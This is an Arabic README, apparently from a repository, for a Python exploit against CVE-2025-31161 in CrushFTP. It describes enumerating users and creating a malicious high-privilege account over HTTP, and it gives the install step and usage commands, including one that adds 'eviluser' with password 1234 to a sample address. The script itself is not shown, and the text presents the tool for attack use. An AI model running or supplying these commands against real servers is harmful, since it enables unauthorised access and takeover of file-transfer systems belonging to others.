
سكربت استغلال بلغة Python لـ CVE-2025-31161 يستهدف CrushFTP. يعدد المستخدمين وينشئ حسابات ضارة بصلاحيات مرتفعة عبر طلبات HTTP.
يحتوي هذا المستودع على سكربت بلغة Python للتفاعل مع خدمة CrushFTP المعرضة لثغرة CVE-2025-31161 يتيح لك السكربت سرد المستخدمين الحاليين وإضافة مستخدم خبيث من خلال استغلال الثغرة.
requestspip install -r requirements.txt
python3 CVE-2025-31161.py listusers --ip <IP> --port <PORT>
python3 CVE-2025-31161.py adduser --ip <IP> --port <PORT> --valid_username <VALID_ADMIN> --username <NEW_USER> --password <PASSWORD>
python3 CVE-2025-31161.py listusers --ip 192.168.1.100 --port 80
python3 CVE-2025-31161.py adduser --ip 192.168.1.100 --port 8080 --username eviluser --password 1234